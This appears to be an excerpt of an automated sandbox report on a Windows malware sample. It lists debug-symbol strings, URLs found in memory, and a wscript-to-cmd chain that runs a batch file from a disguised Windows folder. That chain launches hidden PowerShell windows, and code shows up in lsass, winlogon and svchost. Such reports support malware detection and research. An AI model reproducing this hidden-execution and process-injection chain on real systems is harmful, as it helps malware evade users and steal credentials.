Source: |
Binary string: System.Configuration.Install.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Data.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Xml.pdbp source: WER8844.tmp.dmp.11.dr |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: C:\Users\admin\source\repos\Uni2\Uni2\obj\x64\Release\Uni2.pdb source: AdjustLoader.exe |
Source: |
Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Powershell.PSReadline.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.DirectoryServices.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.DirectoryServices.pdb source: WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Xml.ni.pdbRSDS# source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Core.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Numerics.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.pdb source: WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.DirectoryServices.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.Install.pdb4 source: WER4655.tmp.dmp.45.dr |
Source: |
Binary string: System.Management.ni.pdbRSDSJ< source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: mscorlib.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.Install.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.ni.pdbRSDScUN source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Xml.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.CSharp.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.DirectoryServices.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.Install.pdb` source: WER8844.tmp.dmp.11.dr |
Source: |
Binary string: System.Configuration.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.DirectoryServices.pdbh source: WER4655.tmp.dmp.45.dr |
Source: |
Binary string: System.Configuration.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Data.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Data.ni.pdbRSDSC source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.pdbjS source: WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Xml.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.Automation.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Numerics.ni.pdbRSDSautg source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.CSharp.pdb%N source: WER4655.tmp.dmp.45.dr |
Source: |
Binary string: System.Data.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.Automation.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.Automation.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr |
Source: |
Binary string: mscorlib.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.Automation.pdb3 source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: mscorlib.pdbPYW source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Management.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Core.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Transactions.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Configuration.pdbH source: WER4655.tmp.dmp.45.dr |
Source: |
Binary string: System.Core.pdbiy source: WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Transactions.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr |
Source: |
Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Transactions.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: |
Binary string: System.Core.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr |
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0 |
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0 |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0 |
Source: powershell.exe, 00000012.00000002.2239343406.0000013870247000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000012.00000002.2239343406.0000013870247000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2 |
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07 |
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07 |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0? |
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0 |
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00 |
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0 |
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0200000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 |
Source: lsass.exe, 00000039.00000000.2382136485.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512 |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd |
Source: lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.digicert.com0 |
Source: lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.digicert.com0: |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.digicert.com0H |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382454230.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.msocsp.com0 |
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust |
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2407283977.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D5151000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: lsass.exe, 00000039.00000000.2382136485.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy |
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties |
Source: lsass.exe, 00000039.00000000.2382097694.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/ |
Source: Amcache.hve.11.dr |
String found in binary or memory: http://upx.sf.net |
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.2382849777.00000202C0390000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://www.digicert.com/CPS0~ |
Source: powershell.exe, 00000012.00000002.2242069993.00000138702D0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 0000002F.00000002.2587997182.0000024D9FD4C000.00000004.00000020.00020000.00000000.sdmp, Null.39.dr, Null.8.dr |
String found in binary or memory: https://aka.ms/pscore6 |
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D5151000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000002E.00000002.2407283977.0000000004AC9000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2407283977.0000000004ADC000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lBqq |
Source: powershell.exe, 00000008.00000002.2018154793.0000027B00001000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.0000025800001000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6xGa |
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DFE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/winsvr-2022-pshelp |
Source: powershell.exe, 00000012.00000002.2020721365.0000013800DD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020721365.0000013800DFE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX |
Source: powershell.exe, 00000034.00000002.2412537016.000002D0D537B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000012.00000002.2020721365.0000013801152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2412537016.000002D0D62A0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\cmd.exe |
Code function: 1_3_00000208442DCDB8 |
1_3_00000208442DCDB8 |
Source: C:\Windows\System32\cmd.exe |
Code function: 1_3_00000208442D2398 |
1_3_00000208442D2398 |
Source: C:\Windows\System32\cmd.exe |
Code function: 1_3_00000208442DCC34 |
1_3_00000208442DCC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 2_3_0000020E8B1C2398 |
2_3_0000020E8B1C2398 |
Source: C:\Windows\System32\conhost.exe |
Code function: 2_3_0000020E8B1CCC34 |
2_3_0000020E8B1CCC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 2_3_0000020E8B1CCDB8 |
2_3_0000020E8B1CCDB8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 18_2_00007FFD9B7D4070 |
18_2_00007FFD9B7D4070 |
Source: C:\Windows\System32\cmd.exe |
Code function: 21_3_000001CC9145CDB8 |
21_3_000001CC9145CDB8 |
Source: C:\Windows\System32\cmd.exe |
Code function: 21_3_000001CC91452398 |
21_3_000001CC91452398 |
Source: C:\Windows\System32\cmd.exe |
Code function: 21_3_000001CC9145CC34 |
21_3_000001CC9145CC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 22_3_00000261C3DCCDB8 |
22_3_00000261C3DCCDB8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 22_3_00000261C3DCCC34 |
22_3_00000261C3DCCC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 22_3_00000261C3DC2398 |
22_3_00000261C3DC2398 |
Source: C:\Windows\System32\conhost.exe |
Code function: 27_3_000002220AB6CC34 |
27_3_000002220AB6CC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 27_3_000002220AB6CDB8 |
27_3_000002220AB6CDB8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 27_3_000002220AB62398 |
27_3_000002220AB62398 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_3_0000024D9FF4CC34 |
47_3_0000024D9FF4CC34 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_3_0000024D9FF42398 |
47_3_0000024D9FF42398 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_3_0000024D9FF4CDB8 |
47_3_0000024D9FF4CDB8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_2_0000024D9FF7D834 |
47_2_0000024D9FF7D834 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_2_0000024D9FF72F98 |
47_2_0000024D9FF72F98 |
Source: C:\Windows\System32\conhost.exe |
Code function: 47_2_0000024D9FF7D9B8 |
47_2_0000024D9FF7D9B8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 54_3_00000123B852CDB8 |
54_3_00000123B852CDB8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 54_3_00000123B8522398 |
54_3_00000123B8522398 |
Source: C:\Windows\System32\conhost.exe |
Code function: 54_3_00000123B852CC34 |
54_3_00000123B852CC34 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 55_3_0000021A20192398 |
55_3_0000021A20192398 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 55_3_0000021A2019CC34 |
55_3_0000021A2019CC34 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 55_3_0000021A2019CDB8 |
55_3_0000021A2019CDB8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC64CDB8 |
56_3_00000225DC64CDB8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC642398 |
56_3_00000225DC642398 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC64CC34 |
56_3_00000225DC64CC34 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC61CDB8 |
56_3_00000225DC61CDB8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC612398 |
56_3_00000225DC612398 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 56_3_00000225DC61CC34 |
56_3_00000225DC61CC34 |
Source: C:\Windows\System32\lsass.exe |
Code function: 57_3_00000202C0AE2398 |
57_3_00000202C0AE2398 |
Source: C:\Windows\System32\lsass.exe |
Code function: 57_3_00000202C0AECC34 |
57_3_00000202C0AECC34 |
Source: C:\Windows\System32\lsass.exe |
Code function: 57_3_00000202C0AECDB8 |
57_3_00000202C0AECDB8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 58_3_000002A661302398 |
58_3_000002A661302398 |
Source: C:\Windows\System32\svchost.exe |
Code function: 58_3_000002A66130CDB8 |
58_3_000002A66130CDB8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 58_3_000002A66130CC34 |
58_3_000002A66130CC34 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF23CDB8 |
59_3_000002BAAF23CDB8 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF232398 |
59_3_000002BAAF232398 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF23CC34 |
59_3_000002BAAF23CC34 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF1ACDB8 |
59_3_000002BAAF1ACDB8 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF1A2398 |
59_3_000002BAAF1A2398 |
Source: C:\Windows\System32\dwm.exe |
Code function: 59_3_000002BAAF1ACC34 |
59_3_000002BAAF1ACC34 |
Source: C:\Windows\System32\svchost.exe |
Code function: 60_3_0000026A8799CC34 |
60_3_0000026A8799CC34 |
Source: C:\Windows\System32\svchost.exe |
Code function: 60_3_0000026A87992398 |
60_3_0000026A87992398 |
Source: C:\Windows\System32\svchost.exe |
Code function: 60_3_0000026A8799CDB8 |
60_3_0000026A8799CDB8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 61_3_000001795377CDB8 |
61_3_000001795377CDB8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 61_3_0000017953772398 |
61_3_0000017953772398 |
Source: C:\Windows\System32\svchost.exe |
Code function: 61_3_000001795377CC34 |
61_3_000001795377CC34 |
Source: C:\Windows\System32\svchost.exe |
Code function: 62_3_000002295D53CDB8 |
62_3_000002295D53CDB8 |
Source: C:\Windows\System32\svchost.exe |
